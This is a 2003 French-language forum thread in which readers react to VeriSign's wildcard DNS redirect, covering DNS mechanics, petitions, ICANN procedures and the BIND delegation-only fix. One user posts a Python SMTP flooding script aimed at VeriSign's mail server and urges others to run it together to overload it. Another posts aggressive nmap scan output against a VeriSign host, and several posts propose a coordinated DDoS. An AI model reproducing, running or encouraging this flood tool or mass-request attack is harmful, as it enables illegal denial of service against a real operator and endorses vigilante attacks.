      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Olivier (site web personnel) le 17 septembre 2003 à 15:37. Évalué à 1.
        
        C'est pas grave, tu contactes direcement le serveur de mail de VeriSign, sans passer par un intermediaire...
        
        Au pire, tu fais un telnet sur son port 25 !!!
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par xael (site web personnel) le 18 septembre 2003 à 23:13. Évalué à 1.
        
        Application en Python pour innonder leur mailer daemon.
        #!/usr/bin/python import socket, random, time random.seed() while 1: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Connect to verisign.verisign_fuck.com:25" s.connect(("verisign.verisign_fuck.com", 25)) s.send("helo sucker\n" +"mail from: motherfucker@verisign.com\n" +"mail from: motherfucker@verisign.com\n" +"mail from: motherfucker@verisign.com\n" +"rcpt to: ") count=0 ok=1 while ok==1: try: s.send(random.choice(['a','b','c','d','e','f','g','h', 'i','j','k','l','m','n','o','p', 'q','r','s','t','u','v','w','x', 'y','z'])) count=count+1 except: ok=0 print "Disconnected -",count, "bytes flooded" # do not charge *our* network too much time.sleep(10) s.close()
        Source : http://www.bidules.org/flood.py(...) Evidement, c'est en GPL ;-) Bonne utilisation ;-)
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Alain Tésio le 19 septembre 2003 à 22:53. Évalué à 2.
        
        Essaies "dig totoilestpascontent.com mx" et tu verras qu'il n'y a pas de champ MX pour un domaine inconnu, donc les mails vers des domaines inconnus ne devraient jamais arriver chez verisign.
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Boa Treize (site web personnel) le 10 octobre 2003 à 15:22. Évalué à 1.
        
        Pas de champ MX, donc le mailer va utiliser le champ A, et hop, chez Verisign !
# Question sur les caches DNS

Posté par norbs le 16 septembre 2003 à 22:27. Évalué à 2.

Que se passera t'il si un virus fait des lookup aléatoires en grand nombre ?
Style quelques milliers de lookups par utilisateur infecté ? Est-ce que les DNS wanadoo ou free par exemple pourront tenir la charge en ayant à chaque fois à enregistrer dans leur cache les infos envoyées par Verisign ?
- [^] # Re: Question sur les caches DNS
  
  Posté par gebura le 17 septembre 2003 à 19:30. Évalué à 1.
  
  Ca peut etre une maniere de voire les choses, en profitter pour en informer les internautes pourait en etre une autre, maintenant si ca t amuse de prendre le risque aucun pb...
  - [^] # Re: Question sur les caches DNS
    
    Posté par norbs le 17 septembre 2003 à 22:09. Évalué à 2.
    
    Non ce n'était pas une incitation... Mais si moi (qui n'écris pas de virus...) peut me poser la question, n'importe quel script kiddie peut se la poser...
    Comme dans ce cas, au lieu de simplement attaquer le site de windowsupdate, on pourrait attaquer tous les fournisseurs internet d'un coup, ce serait quand même un pb plutôt grave...
    En fait la bonne question était plutôt "que devraient faire les fai pour se protéger de ce type d'attaques ?"
# DOS

Posté par Tutur le 16 septembre 2003 à 22:29. Évalué à 2.

Cool, une nouvelle maniere de dosser une machine, la faire passer pour celle de verisign. Vu le trafic qu'il doit y avoir, je doute qu'il ai beaucoup de serveur qui peuvent tenir la charge.
Grand concours :
Qui sera le premier a se prendre cette attaque dans la figure?
# VeriSign va sauver l'Internet ?

Posté par voutch le 17 septembre 2003 à 01:11. Évalué à -8.

Bof, franchement, je ne vois pas ou est le probleme.

D'accord ca change, mais VeriSign à bien droit à une juste rémunération de ses services, et si c'avait toujours était comme ca sur le Net, personne ne se plaindrait.
D'ailleurs on devrait plutôt remercier VeriSign de ne pas avoir fait ce truc avant, ca a doit leur faire pas mal de manque à gagner, depuis 95...

Et puis ca doit faire enrager Bill Gate, donc c'est tres bien.

Et puis apres tout, les gens n'ont qu'a écrire les URL correctement, merde alors, avec plus de 20 ans d'études, s'ils n'y arrivent pas, c'est qu'ils ne sont complétement demeurés ou pas assez appliqués. La crainte de recevoir une bonne pub dans les dents est un juste chatiment qui les fera progresser.
Car la comme partout ailleurs, il n'y a que la répression qui marche. Bref, vive les pub débiles qui foutent la honte !
:-)
- [^] # Re: VeriSign va sauver l'Internet ?
  
  Posté par Woodstock le 17 septembre 2003 à 09:20. Évalué à 0.
  
  Je ne moinsse pas parceque je pense que c'est du 2nd degré, n'est-ce pas ?
  
  Mais je ne plusse pas non plus parceque je trouve que ça manque de smileys dans ce cas...
- [^] # Re: VeriSign va sauver l'Internet ?
  
  Posté par Cédric Blancher le 17 septembre 2003 à 10:36. Évalué à 2.
  
  Personne n'a mis un pétard sur la tempe des mecs de VeriSign[1] pour qu'ils se portent volontaires pour l'hébergement de deux TLD à ce que je sache.
  
  Ce que tu dis, mais c'est probablement du 2nd degré je pense, c'est un peu comme un mec qui se servirait de son statut au sein d'une association pour laquelle il est bénévole pour se faire de l'argent[2]. Ce n'est pas tout à fait du détournement de fond, mais ça frise l'abus de bien sociaux, non ? Tout de suite, ça fais (j'espère) moins sympathique comme cela, non ?
  
  Les implications techniques sont ce qu'elles sont, mais c'est surtout l'éthique qui souffre, et c'est ça qui est grave.
  
  [1] The Value of Trust... Mouahahahah...
  [2] Toute ressemblance avec des évènements ou des personnages réels est évidemment complètement involontaire et fortuite...
  - [^] # Re: VeriSign va sauver l'Internet ?
    
    Posté par Laurent Laborde (site web personnel) le 17 septembre 2003 à 19:08. Évalué à 0.
    
    je dirais meme :
    
    [2] Toute ressemblance avec des faits ou des personnes ayant ou ayant pu exister, de
    même que des événements dont il se pourrait que un jour, ça puisse y ressembler,
    même de loin et à contre-jour, et même si c'est dans longtemps, et aussi même si
    c'est fait exprès ou pas, en Belgique ou dans un autre pays, tel que la France
    ou le Tonkin, par exemple, et ce sous quelque forme que ce soit, orale, écrite,
    visuelle, mimée, numérique et sur tout autre support ou mode de communication
    ayant existé, existant, ou qui existera peut-être un jour quelque part ou
    ailleurs, ne serait due qu'à un hasard purement fortuit et/ou à une quelconque
    limitation intellectuelle ayant existé, existante, ou qui existera certainement
    un jour ou l'autre chez une personne concernée ou pas.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Roger Rabbit le 17 septembre 2003 à 03:07. Évalué à 1.

Autant amener une réflexion a se faire moinssoyer.

Depuis 3/4 ans que je lis DFLP, la liberté que nous avons
en tant que citoyens, en tant qu'utilisateurs de LL, se
réduit comme une peau de chagrin. Certes les LL sont
une composante majeure de l'informatique, mais il n'en
reste pas moins que comme dans la vie, ce ne sont pas
les gens désinteressé qui menent le monde ...

Loin de moi l'idée de vous sortir un discours anarchico-lycéen
à trois sous. Je comprends tout à fait ce qui mène le
monde et pourquoi. [ du moins je pense ].

Mais en temps que développeur, j'abstrais le concept de
réalité économique exacerbée. Ce type de sujet ressurgit
sans cesse et sans cesse.

#reflexion sur freenode pour abstraire la lutte et génréraliser
nos moyen d'actions.

A bientot.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Paul le 17 septembre 2003 à 09:35. Évalué à 0.
  
  hey Roger Rabbit, y'a personne sur ton chan ;-)
  
  bah, tu dois ronfler à cette heure ci --> |-1|
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Michel Pastor le 17 septembre 2003 à 03:22. Évalué à 2.

Apparament ya pas qu'une machine et c'est tout filtré de partout, le timeout sur le port 80 c'est pas parce que la machine est tombée

nmap -sS -v -F -O -P0 -TAggressive 64.94.110.11

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host sitefinder-idn.verisign.com (64.94.110.11) appears to be up ... good.
Initiating SYN Stealth Scan against sitefinder-idn.verisign.com (64.94.110.11)
Adding open port 25/tcp
The SYN Stealth Scan took 29 seconds to scan 1150 ports.
For OSScan assuming that port 25 is open and port 1 is closed and neither are fi
rewalled
For OSScan assuming that port 25 is open and port 1 is closed and neither are fi
rewalled
For OSScan assuming that port 25 is open and port 1 is closed and neither are fi
rewalled
Interesting ports on sitefinder-idn.verisign.com (64.94.110.11):
(The 1142 ports scanned but not shown below are in state: closed)
Port State Service
23/tcp filtered telnet
25/tcp open smtp
79/tcp filtered finger
80/tcp filtered http
135/tcp filtered loc-srv
161/tcp filtered snmp
162/tcp filtered snmptrap
514/tcp filtered shell
No OS matches for host (If you know what OS is running on it, see http://www.ins(...)
ecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.00%P=i686-pc-linux-gnu%D=9/17%Time=3F67B6EC%O=25%C=1)
TSeq(Class=TR%IPID=Z)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=N)
PU(Resp=N)

TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: All zeros

Nmap run completed -- 1 IP address (1 host up) scanned in 65 seconds
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par beb le 17 septembre 2003 à 09:21. Évalué à 1.
  
  Difficulty=9999999 (Good luck!)
  
  Arf :)
  
  ... c'est bon je fais que passer -->[]
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par campagnard le 17 septembre 2003 à 07:11. Évalué à 1.

Une ch'tite question : comment ils ont fait, techniquement ? Faudrait qu'ils puissent controler tous les DNS, non ?

Autre question : vous croyiez que ca va durer ? Avec les procès de Grosoft, Gogole et autres qu'ils vont se manger, y'a de quoi couler une boite, quelque soit les benefices qu'ils ont pu en tirer.

En plus meme en investissant des milliards et des milliards de $ dans du matos, ils pourront jamais tenir la charge (je sais qu'ils ne la tiennent deja pas), avec toutes les machines de spammeurs et autres surveilleurs-pollueurs du net qui passent leur temps a essayer des noms de domaines.

Enfin moi c'est ce que je me dis, mais j'y connais strictement rien.
Merci de m'expliquer comment ca tient techniquement et comment ils peuvent s'en sortir.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Erwan le 17 septembre 2003 à 07:46. Évalué à 2.
  
  Les DNS ne fonctionnent pas completement en peer-to-peer, ils se calent sur Verisign qui gerent les domaines .com .net et je crois .org.
  
  Les domaines nationaux sont geres par des instances locales (AFNIC pour le .fr)
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par qaghan le 17 septembre 2003 à 09:55. Évalué à 3.
    
    Pour les .org, VeriSign n'en a plus la charge depuis le 1/01/2003, maintenant c'est PIR (sans mauvais jeux de mots ;-)
    
    http://www.icann.org/tlds/(...)
    http://www.pir.org/about_pir/(...)
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par campagnard le 17 septembre 2003 à 13:40. Évalué à 2.
      
      Je comprends toujours pas comment ils ont pu se démerder techniquement pour faire ca.
      
      Desolé je suis un peu nul.
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Julien Wajsberg le 17 septembre 2003 à 14:47. Évalué à 5.
        
        C'est eux qui gèrent les serveurs de noms «root» pour .com et .net.
        Ça signifie que c'est à eux qu'on demande les infos pour tous les noms de domaines .com et .net, moins qu'ils soient en cache.
        
        En gros, si tu veux te connecter sur www.microsoft.com, tu demandes d'abord à ces serveurs de noms root quels sont les dns qui peuvent te donner les infos sur microsoft.com.
        C'est seulement après que tu vas voir ces derniers dns, pour avoir l'info finale, savoir l'IP de www.microsoft.com.
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par campagnard le 19 septembre 2003 à 10:57. Évalué à 1.
        
        Merci beaucoup pour cette explication claire, nette et precise.
# action coordonnée

Posté par passant·e le 17 septembre 2003 à 08:04. Évalué à 1.

Faudrait faire une action synchronisée entre plusieur milliers d'internaute... Genre le lundi entre 2h et 2h10 faire pleins de requête sur patatitpatata.com et recommencer chaque semaine, jour, heure...

c''est illégal docteur ??
Je trolle dès quand ça parle business, sécurité et sciences sociales
- [^] # Re: action coordonnée
  
  Posté par Olivier BENDRIES (site web personnel) le 17 septembre 2003 à 08:54. Évalué à 1.
  
  oui, c'est une attaque ddos... je suppose qu'elle est reprimée dans pas mal de pays.
  - [^] # Re: action coordonnée
    
    Posté par Woodstock le 17 septembre 2003 à 09:17. Évalué à 1.
    
    Ben non, ce n'est pas une attaque DoS... puisque les 'voyoux' ne feraiit que se tromper dans des adresses... le genre de trucs qui arrivent à tout le monde presque tous les jours.
    
    C'est eux-mêmes qui redirigent tous ces appels vers le même site ensuite... ils n'auraient donc qu'à se prendre à eux-même.
    
    Enfin, c'est mon avis...
  - [^] # Re: action coordonnée
    
    Posté par Charles Plessy (site web personnel) le 17 septembre 2003 à 09:22. Évalué à 2.
    
    Par contre, je me demande s'il n'est pas légal de faire chacun chez soi quelques requêtes. Dans ce cas, individuellement, il n'y a pas de comportement aggressif, et le bloquage vient du nombre... Exactement comme quand une manif coupe la circulation.
    - [^] # Re: action coordonnée
      
      Posté par Olivier (site web personnel) le 17 septembre 2003 à 15:38. Évalué à 0.
      
      Sur Free, cela ne passera pas. Il y a un proxy transparent, et quand on veut une page d'un serveur qui n'existe pas, on tombe sur une page par défaut de Free...
      - [^] # Re: action coordonnée
        
        Posté par Stéphane Salès le 17 septembre 2003 à 16:47. Évalué à 1.
        
        l'endroit où je suis en ce moment possède un accès adsl free 512, et je tombe bien sur la page de verisign si te tape un nom de domaine inexistant.
        
        [^] # Re: action coordonnée
        
        Posté par spell (site web personnel) le 17 septembre 2003 à 17:37. Évalué à 2.
        
        Je m'y connais pas trop en rézo,
        mais ca me semble logique, vu que maintenant,
        il n'y a plus de "domaine inexistant". Le proxy Free ne peut pas
        te mettre sa page d'erreur, vu qu'il n'y a plus jamais d'erreur retournée.
      - [^] # Re: action coordonnée
        
        Posté par Anthony R. le 17 septembre 2003 à 18:06. Évalué à 2.
        
        Je suis sur free adsl 512 et je n'ai jamais vu une seule page de free lorsque je tape une adresse invalide. Mozilla et Mozilla Firebird affiche juste la boite de dialogue www.le-site-qui-n-existe-pas.abc est introuvable.
        
        Enfin ca c'était avant vu que maintenant tous existe.
        
        D'ailleurs il y a fort a parier que ce nouveau mode de fonctionnement déconcerte un certain nombre d'utilisateur. Sans parler que du fait de l'engorgement du serveur Verisgn (C)(TM) et des temps d'attentes qui en découle avant le timeout, certains utilsateurs vont rejeter ces «lenteurs» sur leur fournisseurs d'accès, de même que ceux qui penseront avoir taper l'URL correctement et qui donc ne verront pas la page qu'ils attente. Sans parler de ceux qui sont en RTC et pour lesquelles les délais seront encore plus longs. On peux penser que ces problème vont donc également se faire ressentir sur les hotlines des FAI.
        
        Ne parlons même pas des admins qui ne font pas de veilles technologiques et qui vont se tirer les cheveux pour trouver pourquoi leurs systèmes informatiques ne fonctionnent pas comme ils le devraient.
        
        --
        anthony
- [^] # Re: action coordonnée
  
  Posté par Benjamin Michotte le 17 septembre 2003 à 09:19. Évalué à 1.
  
  ben non, tu n'attaques versigicle, tu attaques un serveur qui n'existe pas, donc ton action est inexistante, donc, ce n'est pas illégal
  - [^] # Re: action coordonnée
    
    Posté par passant·e le 17 septembre 2003 à 09:27. Évalué à 1.
    
    donc on pourrait se réunir pour faire des requetes sur un serveur qui n'existe.
    
    du monde intéressé ? pour faire un truc contre un truc qui n'existe pas ?
    
    on pourrait faire une mailing liste pour discuter de choses qui n'existent pas.
    
    ça intéresse du monde ???
    Je trolle dès quand ça parle business, sécurité et sciences sociales
    - [^] # Re: action coordonnée
      
      Posté par butterfly le 17 septembre 2003 à 10:07. Évalué à 1.
      
      oui, moi !!
      
      mais j'ai quand meme une petite question: pourquoi personne n'en parle (je ne parle pas d'ici), est ce que cette information est connue de tous ??
      car on dirai bien que non! enfin pour l'instant !
      - [^] # Re: action coordonnée
        
        Posté par Olivier BENDRIES (site web personnel) le 17 septembre 2003 à 11:33. Évalué à 3.
        
        Cette information n'est diffusée que depuis 48h, ya dejà pas mal d'article sur yahoo US. Je pense qu'il y ait peu de chance pour que l'info tombe en premier page de l'actu des sites generalistes genre le monde... Mais parcontre, cette mini explosion risque de faire couler parmal d'encre dans les magazines informatiques pour les prochaines editions !
        
        Des possibles grand titre:
        "Verisign collecte tous vos mails en erreurs"
        "Verisign: Il n'y aurai plus d'erreurs sur internet !!"
        "Rentabiliser les erreurs internet: le pari de verisign "
        "fausses erreurs, vrais pubs"
        ... avec une pseudo analyse, trois blabla sur le spam qui n'a rien a voir =)
        
        [^] # Re: action coordonnée
        
        Posté par butterfly le 17 septembre 2003 à 11:45. Évalué à 1.
        
        j'attend vraiment de voir ce qui va se passer....
        car pour l'instant c trop tot !
        
        [^] # Re: action coordonnée
        
        Posté par Ju. le 17 septembre 2003 à 20:38. Évalué à 2.
        
        Ca arrive ... doucement mais ca arrive (meme sur le site de TF1 ! ;-)
        
        Ma page d'info :
        
        http://news.google.com/news?hl=fr&ie=UTF-8&oe=utf-8&q=v(...)
        
        Le systeme de news de Google est vraiment bien surtout depuis que linuxfr y est ! (No troll inside)
        ;-)
        
        L'article de "Alain Thivillon [...] consultant senior au sein du cabinet HSC" est tres interessant, enfin bon forcement HSC ...
        
        http://www.zdnet.fr/actualites/opinions/0,39020797,39123896,00.htm(...)
    - [^] # Re: action coordonnée
      
      Posté par xael (site web personnel) le 18 septembre 2003 à 23:23. Évalué à 1.
      
      Je propose le script python suivant http://www.bidules.org/flood.py(...)
      pour innonder leur serveur mail fantoche...
      
      Il tourne sur ma bécane... soyez nombreux pour surcharger leurs machines ;-)
  - [^] # Re: action coordonnée
    
    Posté par Prosper le 17 septembre 2003 à 10:08. Évalué à 2.
    
    aaaah mais alors verisign fait partie de la kabale !!!! [:totoz]
- [^] # Re: action coordonnée
  
  Posté par Delannoy Maxence (site web personnel) le 17 septembre 2003 à 10:35. Évalué à 2.
  
  Ca augmenterait le nombre de hits chez Verisign, ce qui leur permettrait de vendre plus cher leur espace publicitaire...
- [^] # Re: action coordonnée
  
  Posté par tene le 17 septembre 2003 à 11:49. Évalué à 2.
  
  Intéret? tu fais ramer leur serveur (super utile, personne n'y va volontairement, bloquer un site commercial en vue d'empêcher les utilisateur d'y accéder, c'est con, mais je peux y voir un intéret, mais là...), tu bouffes de la bande passante, éventuellement de ton quota... et s'ils ont des pubs là dessus, ça pourrait même leur faire des hits...
  
  Bref c'est quoi le but? ne serait-il pas plus intéressant de développer un chtit patch pour ton serveur DNS? (ceci dt, ça semble déjà bien en cours).
  
  ps: oui c'est illégal, c'est un ddos, et tu les vises eux, plaider le "je visais pas vérisign, j'ai tapé 10.000 fois la même adresse par erreur" a autant de chance de t'innocenter que plaider la folie...;).
  - [^] # Re: action coordonnée
    
    Posté par Keos le 17 septembre 2003 à 12:48. Évalué à 3.
    
    Mon je pense plutot que l'idéal serait que nos FAI mette leur DNS a jours pour ne plus tomber sur cette page... tout le monde n'as pas de serveur DNS perso ...meme s'il sont nombreux sur cette page a en avoir un ;)
    - [^] # Re: action coordonnée
      
      Posté par Keos le 17 septembre 2003 à 12:52. Évalué à 2.
      
      Bon je me repond a moi meme juste pour ajouter un truc...
      Je pense que l'une des meilleurs action que l'on puisse faire est de faire pressions sur nos FAI une fois les solutions techniques (genre les patch pour bind) en place. Apres une action plus "politique" serait aussi profitable pour obliger verisign a revenir en arriere !
  - [^] # Re: action coordonnée
    
    Posté par SQP le 17 septembre 2003 à 12:56. Évalué à 2.
    
    oui qu'ils viennent attaquer qqn en france et ils auront peut etre à répondre de leurs actes aussi non ?
    
    et on peut plaider la bonne foi en changeant d'addresse à chaque fois vu que ces cons ont TOUT redirigé vers chez eux
    
    -> www.est-ce-que-verisign-suck-goats-00000000000000000000001.com
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par shaym le 17 septembre 2003 à 09:42. Évalué à 4.

Moi je dis qu'une chose : On va "verysaigner" !

Bon c'est nul, je sors ;)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par lord taki (site web personnel) le 17 septembre 2003 à 10:52. Évalué à 2.

Ca devient reellement n'importe quoi. Ca en est presque triste de voir que de telles decisions puissent etre prises.

Au lieu de wgeter a tout va, ne pourrions nous pas monter rapidement une petition internationale (si elle n'existe pas deja)?
Quand je dis nous cela ne se limite evidemment pas a linuxfr.

A la base je suis loin d'etre fan des petitions (qui servent tres tres rarement a quelque chose, du moins en France) mais depuis hier... je me dis pourquoi pas.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par butterfly le 17 septembre 2003 à 11:09. Évalué à 2.
  
  je suis d'accord sur le faite de faire une action,
  mais comment l'organiser ?? pour que cela touche le plus de monde !
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par passant·e le 17 septembre 2003 à 11:19. Évalué à 1.
    
    on peut en discuter sur une liste par exemple..
    
    verisuck@vaccum.ch
    
    pour joindre verisuck-request@vaccum.ch avec subsribe dans le sujet
    
    hmm ??
    Je trolle dès quand ça parle business, sécurité et sciences sociales
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par butterfly le 17 septembre 2003 à 11:23. Évalué à 1.
      
      c a dire ?
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par passant·e le 17 septembre 2003 à 11:24. Évalué à 1.
      
      subscribe
      
      les malins auront corrigé
      Je trolle dès quand ça parle business, sécurité et sciences sociales
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Jul (site web personnel) le 17 septembre 2003 à 11:26. Évalué à 4.
  
  Se faire justice soit même, ou des pétitions alors que verisign tient son autorité de l'ICANN. tsssssss
  
  Cela à déjà été rappelé plus haut :
  La procédure à l'ICANN quand on est pas d'accord avec un registrar est on contacte d'abord verisign pour se mettre d'accord et qu'ensuite on escalade chez eux. Problème : c'est pas drôle.
  
  On peut utiliser la procédure contre le cybersquattage :
  
  InterNIC FAQs on the Uniform Domain Name Dispute Resolution Policy (UDRP)
  http://www.internic.net/faqs/udrp.html(...)
  
  après tout on peut contester le fait que verisign squatte par son joker des noms de domaines qui ne lui appartiennent pas (c'est sur ils n'appartiennent à personne). Mais quand vous tapez «indymedia-press.com» est que vous tombez sur verisign il y a pour indymedia un préjudice ; la société verisign utilise un nom qui ne lui appartient pas et pour laquelle elle n'a pas obtenu les droits d'exploitation (niark, niark niark). C'est surtout vrai je suppose pour les noms en (TM).
  
  On peut même gagner de l'argent :)
  
  Malheureusement les frais de dossier sont à 2000$.
  
  En tout cas on peut titrer dès aujourd'hui
  Verisign plus gros cybersquatteur de la planète
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par passant·e le 17 septembre 2003 à 11:53. Évalué à 1.
    
    Se faire justice soit même, ou des pétitions alors que verisign tient son autorité de l'ICANN. tsssssss
    
    c'est un peu comme faire appel à l'ONU pour éviter des guerres...
    Je trolle dès quand ça parle business, sécurité et sciences sociales
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par butterfly le 17 septembre 2003 à 11:59. Évalué à 2.
      
      oui c'est sur, mais avant ça marchais !!
      et faut bien faire quelque chose !
      non ??
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Jul (site web personnel) le 17 septembre 2003 à 12:23. Évalué à 2.
        
        oui suivre les règles.
        
        Le principe d'internet est :
        1) on essaie de dialoguer posément avec l'acteur en cause (verisign);
        2) seulement après on esaclade auprès du niveau hiérarchique supérieur (IANA)
        3) puis après si pas de réponse on passe au niveau ICANN.
        Rappelons que le comportement attendu de Verisign est décrit dans la RFC 1591 http://www.isi.edu/in-notes/rfc1591.txt(...)
        
        En ne respectant pas ses principes on remet en cause le mode de fonctionnement d'internet plus sûrement que Verisign qui serait heureux de montrer que les internautes sont des terroristes et que le système ne marche pas...
        
        Déjà que SCO microsoft passent leur temps à faire croire qu'ils se font attquer par DOS pour nous montrer du doigt en perséverer dans le discours hacker = pirates, il faudrait peut être pas tomber dans le panneau non plus ?
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par butterfly le 17 septembre 2003 à 12:34. Évalué à 2.
        
        ouai pas bete du tout!!
        
        mais j'ai qand meme bien peur que notre discours ( et bonne volonte ) se fasse arreter bien rapidement par des murs tres tres hauts .....
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par passant·e le 17 septembre 2003 à 12:40. Évalué à 1.
        
        En ne respectant pas ses principes on remet en cause le mode de fonctionnement d'internet
        
        c'est déjà fait me semble-t-il...
        
        un wget sur une adresse qui n'existe pas :-)
        Je trolle dès quand ça parle business, sécurité et sciences sociales
        
        [^] #
        
        Posté par Francois Revol (site web personnel) le 17 septembre 2003 à 15:26. Évalué à 1.
        
        en même temps quand on cherche une @ mail pour écrire à verisign, on sait pas trop laquelle il faut prendre...
        abuse ? =)
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Obsidian le 17 septembre 2003 à 18:24. Évalué à 2.
        
        La RFC est un bon argument mais n'oublions pas que les RFCs sont des « Request For Comment ». La RFC 75 par exemple, est une invitation à une réunion se déroulant à l'Astroworld de Houston pour le 16 novembre 1970 ! :-)
        
        Donc si VeriSign fait un appel à commentaires sur la proposition suivante: « Et si on faisait main basse sur tous les noms de domaines ? Hein ? Qu'est-ce que vous en pensez ? », tout le monde leur répondrait d'oublier l'informatique et d'essayer le show-business, mais leur proposition serait toujours conforme à la RFC qu'ils ont fait publier.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par _alex le 17 septembre 2003 à 22:50. Évalué à 1.
    
    Le plussoit le coup du préjudice. Mais est-ce qu'il y a beaucoup d'entreprise capable de partir dans un procès et qui ont un .com récupérer par verisign ?
    
    Rien à voir : fut un temps, peu être lointain, est-ce que Sun ne se disait pas le "." du ".com" ? (est-ce ça cette phrase ou quelque chose de similaire ?)
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par nodens le 17 septembre 2003 à 23:49. Évalué à 1.
      
      le . du .com c'est parce qu'un serveur ROOT c'est le dernier . dans la logique de l'arborescence DNS.
      Et au moins un des serveurs root tournant sous solaris. Ca doit toujours être le cas d'ailleurs.
      
      rien à voir avec une quelconque mainmise.
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Raphaël SurcouF (site web personnel) le 18 septembre 2003 à 08:21. Évalué à 1.
        
        A l'origine, le sommet de l'arbre DNS se nomme... "." tout court.
        On devrait dire (et écrire) www.domaine.com. et non www.domaine.com
        mais la plupart des applications font d'office cet abus de langage.
        J'en conviens que pour le commun des mortels, c'est aussi difficile à retenir
        que de penser à mettre (et à comprendre pourquoi) http:// devant chaque url...
        
        Mes 2¢...
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Arnaud le 18 septembre 2003 à 09:21. Évalué à 1.
        
        Hé non! Ce qui est amusant, c'est qu'après la pub "c'est nous le . du com", le "point du com" est passé sur du hard IBM (de mémoire). Amusant!
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Agarwaen le 17 septembre 2003 à 15:12. Évalué à 2.
  
  Cette pétition existe :
  
  http://www.petitiononline.com/icanndns(...)
  
  Allez signer !
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par lord taki (site web personnel) le 17 septembre 2003 à 15:19. Évalué à 2.
    
    Je viens de le faire a l'instant mais pour l'instant il y en a peu: 629.
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par butterfly le 17 septembre 2003 à 15:54. Évalué à 2.
      
      on en est a 800 !
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par butterfly le 17 septembre 2003 à 16:31. Évalué à 2.
      
      on vient de depasser les 1000
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 22:34. Évalué à 1.
        
        on a atteint les 4000, avec environ une signature par seconde en ce moment.
        (et bravo à Fabien Marty, le n°4000, il ne remporte rien, mais il fait avancer la cause un petit peu)
# VeriSign n'est pas le seul

Posté par Nicolas ROFFET le 17 septembre 2003 à 13:39. Évalué à 5.

En fait, en lisant la news de Heise (en allemand) :
http://www.heise.de/newsticker/data/ad-17.09.03-000/(...)
je me suis rendu compte que Verisign n'est pas le seul à utiliser ce genre de procédés.

L'adresse http://Verisign-et-les-autres-Suxor-des-ours.museum/(...) , on tombe aussi sur une page et non sur l'erreur 404.

OK, il y a des différences:
- il n'y a pas eu de changement, vu que ca a du toujours ou presque être comme ca, comme les ".museum" sont nouveaux.
- la page est super light, sans Conditions d'utilisations, etc...
- la page répond bien (pas de timeout 9 cas sur 10)
- il n'y a pas grand monde qui utilise les ".museum"
- par contre, la page n'est pas valide non plus selon le validator W3C :-( .

Mais bon, ca fait réfléchir un peu.

Sinon, ce qui est marant dans l'article, c'est le gars de Verisign qui met en garde contre le patch BIND soit-disant violant les standards internet... lol
- [^] # Re: VeriSign n'est pas le seul
  
  Posté par choocroot le 17 septembre 2003 à 14:49. Évalué à 3.
  
  «Sinon, ce qui est marant dans l'article, c'est le gars de Verisign qui met en garde contre le patch BIND soit-disant violant les standards internet...»
  
  Pitoyables ! c'est surtout que ça fout en l'air leur «business plan» ... le prochain communiqué de Verisign sera pour invoquer le DMCA en pretextant qu'on n'a pas le droit de modifier les résultats DNS qu'ils fournissent ?
  
  De toute façons, ce patch est integré dans Bind-9.2.3rc2, donc tous les futurs Bind à partir d'aujourd'hui incluront ce fix en «standard».
  
  Pour le moment, je viens de recompiler/installer bind avec le patch 9.2.2-P1 (http://www.isc.org/products/BIND/delegation-only.html(...)) et je retrouve enfin un comportement «normal» sur mon reseaux.
  
  Il suffit pour cela de rajouter dans `/etc/named.conf' :
  
  zone "com" { type delegation-only; }; zone "net" { type delegation-only; };
  
